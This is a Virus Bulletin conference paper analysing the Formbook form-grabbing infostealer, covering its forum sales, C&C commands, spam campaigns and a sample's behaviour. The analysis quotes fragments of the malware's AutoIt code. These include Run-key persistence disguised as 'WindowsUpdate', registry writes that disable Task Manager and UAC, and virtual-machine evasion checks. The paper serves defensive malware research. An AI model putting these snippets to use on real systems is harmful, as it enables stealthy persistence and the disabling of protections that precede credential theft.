VB2018 paper: Inside Formbook infostealer

Gabriela Nicolao

Deloitte, Argentina

Copyright © 2018 Virus Bulletin


 

Abstract

Formbook [1] is an infostealer that has been advertised for sale in public hacking forums since February 2016 by a user with the handle 'ng-Coder'. It is more advanced than a keylogger as it can retrieve authorization and login credentials from a web data form before the information reaches a secure server, bypassing HTTPS encryption. Formbook is effective even if the victims use a virtual keyboard, auto-fill, or if they copy and paste information to fill the form. The author of Formbook affirms that it is 'browser-logger software', a.k.a. form-grabbing software. Formbook offers a PHP panel, where the buyers can track their victims' information, including screenshots, keylogged data, and stolen credentials. Hosting and domain services are provided for low prices with a bin only available in the Pro version.

Formbook was used in a spam campaign in late 2017, targeting the aerospace, defence contractor and manufacturing sectors in South Korea and the USA. It includes hiding, persistence, anti-analysis, deletion and termination mechanisms along with several commands that the C&C (command-and-control) server can receive. The 'ng-Coder' user indicated that Formbook should not be used for malicious purposes and blocked sales until further notice after the spam campaigns became known. According to 'ng-Coder', Formbook should only be used to spy on family members or employees if the user has the explicit right to do so. However, this claim is dubious given the barely legitimate nature of the use of such software.

 

About formgrabbers

Formgrabbers intercept HTTP(S) data and use inline hooking to redirect the function to one within the formgrabber before transferring the execution flow back to the HTTP function to complete the request. This technique allows formgrabbers to capture a user's information before the user submits it over the Internet to a secure server. While keyloggers focus mainly on capturing the user's input, formgrabbers collect pasted information and/or information selected via a drop-down option, which makes them more efficient than keyloggers.

A formgrabber injects a DLL (Dynamic Link Library) into a browser and monitors for calls to the HttpSendRequest API within WININET.DLL in order to intercept the data before encryption and send all requests to its own code, prior to sending the data onwards. Andromeda (aka Gamarue), Tinba and Weyland‑Yutani BOT are some malware families that use this technique.

 

Formbook background

Prior to advertising it for sale, a user with the handle 'ng-Coder' offered Formbook for free in public hacking forums so that other users could review it.

Formbook-fig1.jpgFigure 1: First mention of Formbook in a forum.

Soon after the free version was released, the user 'ng-Coder' advertised Formbook for sale at an initial price of 250 USD. However, the author reduced the price to 120 USD in early March 2016 after receiving several complaints about the price from forum members. The current pricing list and payment methods offered in the forum are displayed in Figure 2.

Formbook-fig2.pngFigure 2: Pricing list and payment methods for Formbook.

 

Characteristics

According to the user 'ng-Coder', Formbook boasts the following features:

  • Coded in ASM/C (x86_x64)
  • Startup (hidden)
  • Full PE-injection (no DLL/no drop/both x86 and x64)
  • Ring3 kit
  • Bin is Balloon Executable (MPIE + MEE)
  • Doesn't use suspicious Windows APIs
  • No blind hook, all hooks are thread safe including the x64, so crash is unlikely
  • All communications with the panel are encrypted
  • Install manager
  • File browsing (FB Connect)
  • Full Unicode support.

 

Control panel

Formbook works as a botnet, infecting victims that are shown in a web panel in order to manage the information that is retrieved from them. Figure 3 shows the web panel.

Formbook-fig3.jpgFigure 3: Formbook web panel.

Each bot can receive the following commands from the C&C server:

  • Download and execute
  • Update
  • Uninstall
  • Visit URL
  • Clear cookies
  • Restart system
  • Shut down system
  • Force upload keystroke
  • Take screenshot
  • FB Connect (file browsing)
  • Download and execute from FB Connect
  • Update bin from FB Connect

 

Campaigns

Formbook was used in spam campaigns targeting the aerospace, defence contractor and manufacturing sectors within the US and South Korea in 2017 [2]. It was distributed via PDFs with embedded links, DOC and XLS files with malicious macros, and compressed files containing the executable.

It was also observed in 2018, distributed via emails with DOCX files that contained a URL [3]. This URL downloaded an RTF file that exploits CVE-2017-8570 and drops an executable. This executable downloads the Formbook sample.

 

Analysis

The analysed sample is a RAR self-extracting archive (SFX) that contains several files, as shown in Figure 4.

Formbook-fig4.jpgFigure 4: SFX file.

The description to the right of the files shows the following strings:

  • Path=%LocalAppData%\temp\cne
  • Silent=1
  • Update=UcE1U8
  • Setup=axo.exe pwm-axa

Files with a size below 1K contain a few strings that are probably used during decompression.

After executing the SFX file, Formbook extracts the files in %LocalAppData%\temp\cne using CreateDirectoryW. It then deletes the SFX file. Figure 5 shows the file extraction.

Formbook-fig5.pngFigure 5: File extraction.

The axo.exe file is an AutoIt script that is executed with the pwm-axa file as a parameter. Figure 6 shows the properties of the axo.exe file.

Formbook-fig6.pngFigure 6: Properties of the axo.exe AutoIt executable.

The script decrypts Formbook and loads it in memory. In order to do this, it creates a file with a random name that contains Formbook's functionality and deletes it soon after loading it in memory. This file contains 44 functions with obfuscated names. The sni.mp3 file includes interesting strings that were used during the execution, as shown in Figure 7.

formbook-fig7.pngFigure 7: Interesting strings found in the sni.mp3 file.

The script contains the following features:

 

1. Hiding mechanism

The script changes the cne folder attributes to hide its content by executing the command FileSetAttrib($cne_Folder_Path, "+H").

 

2. Persistence mechanism

In order to remain persistent, it modifies the Run registry key with a new key named WindowsUpdate that instructs the execution of axo.exe along with pwm-axa:

If IsAdmin() Then
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", $WindowsUpdate, "REG_SZ", $cne_Folder_Path & "\" & $axo.exe & " " & FileGetShortName(FileGetShortName($cne_Folder_Path & "\" & $pwm-axa)))
Else
RegWrite("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", $WindowsUpdate, "REG_SZ", $cne_Folder_Path & "\" & $axo.exe & " " & FileGetShortName($cne_Folder_Path & "\" & $pwm-axa))
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Run", $WindowsUpdate, "REG_SZ", $cne_Folder_Path & "\" & $axo.exe & " " & FileGetShortName($cne_Folder_Path & "\" & $pwm-axa))
EndIf
Sleep(1000)
Sleep(1000)
EndFunc

Formbook-fig8.jpgFigure 8: Persistence mechanism.

 

3. Protection disabling and anti-analysis

The script tries to modify the following registry keys:

  • RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
  • RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients")
  • RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")

And it:

  • Disables Task Manager
  • Turns off the system protection
  • Disables UAC (User Account Controls)

Formbook will terminate if it finds VMware or VirtualBox processes running in the victim's system and if the 'D' drive has space of less than 1MB:

  • VMwaretray.exe
  • Vbox.exe
  • VMwareUser.exe
  • VMwareService.exe
  • VboxService.exe
  • vpcmap.exe
  • VBoxTray.exe
  • If DriveSpaceFree ("d:\") <1 And ProcessExists ([VMWare or VBox]) then Exit

 

4. Check default browser

The script will check the HKCR\http\shell\open\command registry key to know which Internet browser the victim's machine uses by default.

 

5. Formbook deletion and termination

Formbook will look for the svshost.exe process and terminate if it finds more than two svshost.exe processes running, as shown in Figure 9.

Formbook-fig9.pngFigure 9: Termination.

 

Conclusion

Despite Formbook infostealer having been around for a couple of years now, it only came to public attention after it was extensively used in spam campaigns in late 2017. The fact that Formbook wasn't noticed before is probably because its developers didn't release the builder to the public, so it was easy for them to track its activities and turn it off if they found that it was being used for purposes for which it was not intended or if it was gaining too much attention from the security community. Despite not being broadly used, Formbook represents a real threat, due to it being stealthier and more powerful than keyloggers.

Similar to the Agent Tesla remote access trojan (RAT), the author of Formbook initially offered a beta version of the product free of charge in order to receive feedback and make improvements.

The 'ng-Coder' user indicates that Formbook should not be used for malicious purposes, and after the spam campaigns were made public, he blocked Formbook's sales until further notice. According to 'ng-Coder', Formbook should only be used to spy on family members or employees if the user has the explicit right to do so. However, this claim itself is dubious given the barely legitimate nature of the use of such software.

 

IOCs

The SHA256 hash of the SFX file that was analysed is: 2f74f8518bd14a882a870f3794a76dba381b59c1e40247a2483468959b572d82.

 

References

[1] Schwarz, D. The Formidable FormBook Form Grabber. Arbor Networks, 20 September 2017. https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/.

[2] Villeneuve, N.; Eitzman, R.; Nemes S.; Dean, T. Significant FormBook Distribution Campaigns Impacting the U.S. and South Korea. FireEye, 5 October 2017. https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html.

[3] Urgent server alert malspam delivers formbook trojan via CVE-2017-8570 word doc. My Online Security, 16 February 2018. https://myonlinesecurity.co.uk/urgent-server-alert-malspam-delivers-formbook-trojan-via-cve-2017-8570-word-doc.

Download PDF

twitter.png
fb.png
linkedin.png
hackernews.png
reddit.png

 

Latest articles:

VB2018 paper: Lazarus Group: a mahjong game played with different sets of tiles

The number of incidents attributed to the Lazarus Group, a.k.a. Hidden Cobra, has grown rapidly since its estimated establishment in 2009. In this paper, ESET researchers Peter Kalnai and Michal Poslusny look at various cells within the group, that…

VB2018 paper: Fake News, Inc.

As the world grapples with massive disinformation campaigns waged by the intelligence agencies of hostile nations, we should not forget that such activities are not limited to the purview of the Bears or Pandas of the world, and that even relatively…

Alternative communication channel over NTP

Nikolaos Tsapakis explores Network Time Protocol (NTP) as an alternative communication channel, providing practical examples, code, and the basic theory behind the idea.

VB2018 paper: Under the hood: the automotive challenge

In an average five-year-old car, there are about 30 different computers on board. In an average new car, there are double that number, and in some cases up to 100. That’s the size of network an average SMB would have, only there’s no CIO/CISO, and…

VB2018 paper: Android app deobfuscation using static-dynamic cooperation

Malicious Android applications are quite common, and can even be found from time to time in the Google Play Store. Thus, a lot of work has been done in both industry and academia on Android app analysis, and in particular, static code analysis. One…


Bulletin Archive

We have placed cookies on your device in order to improve the functionality of this site, as outlined in our cookies policy. However, you may delete and block all cookies from this site and your use of the site will be unaffected. By continuing to browse this site, you are agreeing to Virus Bulletin's use of data as outlined in our privacy policy.